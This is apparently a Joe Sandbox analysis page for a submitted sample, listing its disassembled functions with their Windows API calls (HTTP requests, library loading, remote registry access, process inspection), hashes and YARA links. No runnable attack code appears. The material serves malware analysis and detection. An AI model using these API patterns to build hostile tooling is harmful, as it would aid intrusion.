                                                                        • Instruction ID: 04dd7b9f6208c8cae5a5207b7ea9bc75c96bead8159f33369324957a73f9e06c
                                                                        • Opcode Fuzzy Hash: d569c276bd22f9ce2b9f49742c48f5eb7d10cb5a337c49365311a259200c8951
                                                                        • Instruction Fuzzy Hash: 1D414A71604204EFDB15CF54C889AEB7BF9EF84714B1490A9A909AF216D7B1E944CBA0
                                                                        Function 00EB5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB5075
                                                                        • GetMenuItemInfoW.USER32 ref: 00EB5091
                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00EB50D7
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F31708,00000000), ref: 00EB5120
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        • Opcode ID: 008396acc2bbe8c024a2bd0b7173c18040dd44f58ec3fc232dbf39e9d7e61315
                                                                        • Instruction ID: 505619c495c4245e3bb844f781c94570a9193917fe38ba7fcd1ca799dcc538ed
                                                                        • Opcode Fuzzy Hash: 008396acc2bbe8c024a2bd0b7173c18040dd44f58ec3fc232dbf39e9d7e61315
                                                                        • Instruction Fuzzy Hash: 2641D472205B019FD710DF28DC80BABBBE4AF85328F14565EF955A72D1D770E904CB62
                                                                        Function 00ED0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00ED0587
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 2358735015-567219261
                                                                        • Opcode ID: fb484ed4b1c8ac26d75151ca652583694bfbb0f283e2ab6cb62429eb01e4477b
                                                                        • Instruction ID: db436bd23710c384db75aefeca0f34eb281e342b19cccac27906edc04ecfc03e
                                                                        • Opcode Fuzzy Hash: fb484ed4b1c8ac26d75151ca652583694bfbb0f283e2ab6cb62429eb01e4477b
                                                                        • Instruction Fuzzy Hash: 8A316030500116AFCB00EF54C941AAEB3B5FF55314B10966AE82AB77D1DB71E916CB80
                                                                        Function 00EAB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EAB88E
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EAB8A1
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EAB8D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        • Opcode ID: 5634bc9967e1b11cc96e74401e707754e8bb65f8327bd4b5b146dea319a5bdc4
                                                                        • Instruction ID: 26393f0946c12b31d7ddabdbd848056a76648a499e6929ebd4ff11ce99774d99
                                                                        • Opcode Fuzzy Hash: 5634bc9967e1b11cc96e74401e707754e8bb65f8327bd4b5b146dea319a5bdc4
                                                                        • Instruction Fuzzy Hash: 7F21B671900104BFD708ABB8DC469FE77BDDF4A354B105119F01ABA1D1DB785D0A9750
                                                                        Function 00EC43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EC4401
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC4427
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EC4457
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EC449E
                                                                          • Part of subcall function 00EC5052: GetLastError.KERNEL32(?,?,00EC43CC,00000000,00000000,00000001), ref: 00EC5067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 1951874230-3916222277
                                                                        • Opcode ID: 27cd46817ca0611dd0884bde74801fad98af64cdeb5ef93ef228aece2b49ce26
                                                                        • Instruction ID: ce70d7d1124d12138368cf31c63cf904ccbea103d5d6f0760e4e012bb8d0e66a
                                                                        • Opcode Fuzzy Hash: 27cd46817ca0611dd0884bde74801fad98af64cdeb5ef93ef228aece2b49ce26
                                                                        • Instruction Fuzzy Hash: 9A21D0F2500208BEE711AF54CD91FBBBAECFB88758F20901EF115F6180EA619D069770
                                                                        Function 00ED90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00ED915C
                                                                        • LoadLibraryW.KERNEL32(?), ref: 00ED9163
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00ED9178
                                                                        • DestroyWindow.USER32(?), ref: 00ED9180
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 6cf92ff8cd241ac090c937c33bdb25eaa1427c5a590e09f1832f36843ac3821d
                                                                        • Instruction ID: 8affc6228f036a885f3ec2f955c7a4fd1da56ddc64b8511133a5f9752436ab2a
                                                                        • Opcode Fuzzy Hash: 6cf92ff8cd241ac090c937c33bdb25eaa1427c5a590e09f1832f36843ac3821d
                                                                        • Instruction Fuzzy Hash: CF21CF71200206BFEF104E64DC88EBB37ADEF99368F11161AF914B6291C731DC42A760
                                                                        Function 00EB9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EB9588
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EB95B9
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00EB95CB
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EB9605
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: a356704f6ee1744461921f4e74555aec6fe4b6ede501fa23f6db8454c8b26759
                                                                        • Instruction ID: 4d735349ac4226ae4f671c0b77b3e1a2016c969002aa1e4b7cdfdaa8abb11283
                                                                        • Opcode Fuzzy Hash: a356704f6ee1744461921f4e74555aec6fe4b6ede501fa23f6db8454c8b26759
                                                                        • Instruction Fuzzy Hash: 48219C70641205ABEB219F25DC04ADB7BE8AF84324F205A19FAA5F72E1D770D944CB60
                                                                        Function 00EB9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EB9653
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EB9683
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00EB9694
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EB96CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 993ab5a3310f3de651974dc19ff20ada874798cd7389241b1586564b6ba447a2
                                                                        • Instruction ID: c300ee2f0de2d7aef6d809553390c8a35f829a3c3c7a3ff56860a3a195067b4f
                                                                        • Opcode Fuzzy Hash: 993ab5a3310f3de651974dc19ff20ada874798cd7389241b1586564b6ba447a2
                                                                        • Instruction Fuzzy Hash: DC21A1715002059FDB209F699C45EDB77E8AF94724F201A18FAA1F72E5E770D845CB50
                                                                        Function 00EBDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBDB0A
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EBDB5E
                                                                        • __swprintf.LIBCMT ref: 00EBDB77
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F0DC00), ref: 00EBDBB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu
                                                                        • API String ID: 3164766367-685833217
                                                                        • Opcode ID: 8bf48024475670b53b10bc84186e9bdc33545bce48142f98d19a453e2087b3a4
                                                                        • Instruction ID: 2d6c62531234ef7da44843dafb516f7f06f03af393751a5aa529c221965ff774
                                                                        • Opcode Fuzzy Hash: 8bf48024475670b53b10bc84186e9bdc33545bce48142f98d19a453e2087b3a4
                                                                        • Instruction Fuzzy Hash: CB217135600108AFCB10EFA5CD85DEEBBF9EF89704B104069F609E7251DB70EA05DB61
                                                                        Function 00EAC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EAC84A
                                                                          • Part of subcall function 00EAC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAC85D
                                                                          • Part of subcall function 00EAC82D: GetCurrentThreadId.KERNEL32 ref: 00EAC864
                                                                          • Part of subcall function 00EAC82D: AttachThreadInput.USER32(00000000), ref: 00EAC86B
                                                                        • GetFocus.USER32 ref: 00EACA05
                                                                          • Part of subcall function 00EAC876: GetParent.USER32(?), ref: 00EAC884
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EACA4E
                                                                        • EnumChildWindows.USER32(?,00EACAC4), ref: 00EACA76
                                                                        • __swprintf.LIBCMT ref: 00EACA90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                        • String ID: %s%d
                                                                        • API String ID: 3187004680-1110647743
                                                                        • Opcode ID: 885712a1b6052e411ab6c1bf3215071f455d55b5be12a1f74ca6b28726fbe3ed
                                                                        • Instruction ID: 89cf80fec1977db6509f68caf61f4729794df387022a0ed9c80ded72370ececd
                                                                        • Opcode Fuzzy Hash: 885712a1b6052e411ab6c1bf3215071f455d55b5be12a1f74ca6b28726fbe3ed
                                                                        • Instruction Fuzzy Hash: 8811AF716002097BCB01BFA08C86FB93BA9AB49704F109066FA1DBE086CB74A945DB71
                                                                        Function 00E97A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00E97AD8
                                                                          • Part of subcall function 00E97CF4: __mtinitlocknum.LIBCMT ref: 00E97D06
                                                                          • Part of subcall function 00E97CF4: EnterCriticalSection.KERNEL32(00000000,?,00E97ADD,0000000D), ref: 00E97D1F
                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00E97AE5
                                                                        • __lock.LIBCMT ref: 00E97AF9
                                                                        • ___addlocaleref.LIBCMT ref: 00E97B17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                        • String ID: `
                                                                        • API String ID: 1687444384-4168407445
                                                                        • Opcode ID: b3de3e84b3528dc41c9b2e5cddca6a158a9ab5932c65f928c4b5b70d0a660a31
                                                                        • Instruction ID: 4dbdcf3c396ae5d9d98224d7f6c966c5ffa4ddcfd399573fc04cfde8da356ef7
                                                                        • Opcode Fuzzy Hash: b3de3e84b3528dc41c9b2e5cddca6a158a9ab5932c65f928c4b5b70d0a660a31
                                                                        • Instruction Fuzzy Hash: 69016D71505B01AFDB20DF75D90674ABBF0EF44725F20990EA4DAA76A0DBB0A684CB01
                                                                        Function 00ED1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ED19F3
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ED1A26
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00ED1B49
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED1BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: 4f9088018a6b7b9555442a8b4633be89ec79a6769cd20105d79ed2c39e1bc607
                                                                        • Instruction ID: bbd78baf97af00130a8c0111940b9da09601e5e003cc9eab96585276c5dbda0e
                                                                        • Opcode Fuzzy Hash: 4f9088018a6b7b9555442a8b4633be89ec79a6769cd20105d79ed2c39e1bc607
                                                                        • Instruction Fuzzy Hash: 27815070600204EFDF10AF64C896BADBBE5EF44720F14949AF909BF392D7B5A941CB90
                                                                        Function 00EB1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00EB1CB4
                                                                        • VariantClear.OLEAUT32(00000013), ref: 00EB1D26
                                                                        • VariantClear.OLEAUT32(00000000), ref: 00EB1D81
                                                                        • VariantClear.OLEAUT32(?), ref: 00EB1DF8
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EB1E26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                        • String ID:
                                                                        • API String ID: 4136290138-0
                                                                        • Opcode ID: fd5e8316c4512117686cd803b3e4127617f7cc902b928a7af9307021176c62c1
                                                                        • Instruction ID: 9ce294535337145239b108c77a9d85789846fd7537d3bd08e5a32ef6e5b11001
                                                                        • Opcode Fuzzy Hash: fd5e8316c4512117686cd803b3e4127617f7cc902b928a7af9307021176c62c1
                                                                        • Instruction Fuzzy Hash: 805149B5A00209AFDB14CF58C890AEAB7B9FF8D314B158559ED59EB300D330EA51CBA0
                                                                        Function 00ED0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00ED06EE
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00ED077D
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00ED079B
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00ED07E1
                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00ED07FB
                                                                          • Part of subcall function 00E8E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EBA574,?,?,00000000,00000008), ref: 00E8E675
                                                                          • Part of subcall function 00E8E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EBA574,?,?,00000000,00000008), ref: 00E8E699
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 327935632-0
                                                                        • Opcode ID: 6200c47414d806d4c457f7ed2b40dec97e3e1e2753fede64ed86585002fea644
                                                                        • Instruction ID: 45f21a487736a9c876a1ea522cb3855a871fe867fd89d5bec3ef75fccfbb09fa
                                                                        • Opcode Fuzzy Hash: 6200c47414d806d4c457f7ed2b40dec97e3e1e2753fede64ed86585002fea644
                                                                        • Instruction Fuzzy Hash: 13511875A00205DFCB04EFA8C881AADB7F5EF59314F18905AE919BB352DB30ED46DB81
                                                                        Function 00ED2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED2EEF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED2F2E
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ED2F75
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00ED2FA1
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED2FAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 3740051246-0
                                                                        • Opcode ID: 1c6f7a8839da6a3771f9cf08a59fce9872df0c45adf571db1160ad151b5feec7
                                                                        • Instruction ID: 3ec88e2f0d879753ec23533d45c627781f75f53badee8a33897747c4e0496b73
